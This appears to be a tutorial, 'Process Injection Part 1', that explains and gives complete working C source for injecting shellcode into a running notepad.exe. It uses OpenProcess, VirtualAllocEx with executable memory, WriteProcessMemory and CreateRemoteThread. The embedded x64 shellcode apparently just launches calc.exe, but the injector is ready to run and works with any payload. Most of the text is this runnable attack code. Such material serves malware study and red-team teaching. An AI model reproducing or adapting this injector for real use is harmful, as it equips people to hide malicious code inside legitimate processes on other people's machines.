Process Injection --Part 1--

This C program performs process injection, specifically remote code injection into a running instance of notepad.exe. Here's a step-by-step breakdown of what the code does:

1 - FindTarget Function (Finds Process ID)

• The FindTarget function takes a process name (ProcName) as an argument and searches for a running process with that name.

• It uses CreateToolhelp32Snapshot to take a snapshot of all running processes.

• It iterates through the process list using Process32Next, checking if the process name matches ProcName (notepad.exe in this case).

• If found, it returns the process ID (PID) of the target process

2 - Injection into Notepad

1. Open Notepad Process

   • The OpenProcess function is used to get a handle to the notepad.exe process with full access (PROCESS_ALL_ACCESS)

2. Allocate Memory in Notepad

   • VirtualAllocEx reserves memory inside notepad.exe with PAGE_EXECUTE_READWRITE permissions, allowing the shellcode to be written and executed.

3. Write the Shellcode into Notepad

   • WriteProcessMemory writes the shellcode (payload[]) into the allocated memory space.

4. Execute the Shellcode in Notepad

   • CreateRemoteThread starts a new thread inside notepad.exe at the memory location where the shellcode was written, effectively executing it.

#include <stdio.h>
#include <Windows.h>
#include <tlhelp32.h>


int FindTarget(const char *ProcName) {
	HANDLE hSnapShot;
	PROCESSENTRY32 pe32;
	pe32.dwSize = sizeof(PROCESSENTRY32);
	int pid = 0;

	hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, pid);

	if (INVALID_HANDLE_VALUE == hSnapShot) {
		printf("[!] There is a problem in hSnapShot\n");
		return -1;
	}

	if (!Process32First(hSnapShot, &pe32)) {
		printf("[!] There is a problem in Process32First \n");
		CloseHandle(hSnapShot);
		return -1;
	}

	while (Process32Next(hSnapShot, &pe32)){
		if (lstrcmpiA(ProcName, pe32.szExeFile) == 0) {
			pid = pe32.th32ProcessID;
			break;
		}
	}

	CloseHandle(hSnapShot);
	return pid;

}

int main() {

unsigned char payload[] = {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,
0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,
0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,
0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,
0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,
0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,
0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,
0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,
0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,
0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,
0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,
0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,
0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,
0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,
0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
0x63,0x2e,0x65,0x78,0x65,0x00
};

	
	HANDLE hProcess; 
	HANDLE hThread ;
	void* exec_mem;
	hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, FindTarget("notepad.exe"));
	exec_mem = VirtualAllocEx(hProcess, NULL, sizeof(payload) , MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(hProcess, exec_mem, payload, sizeof(payload), NULL);
	hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL , 0 , 0);
	CloseHandle(hProcess);
	return 0;

}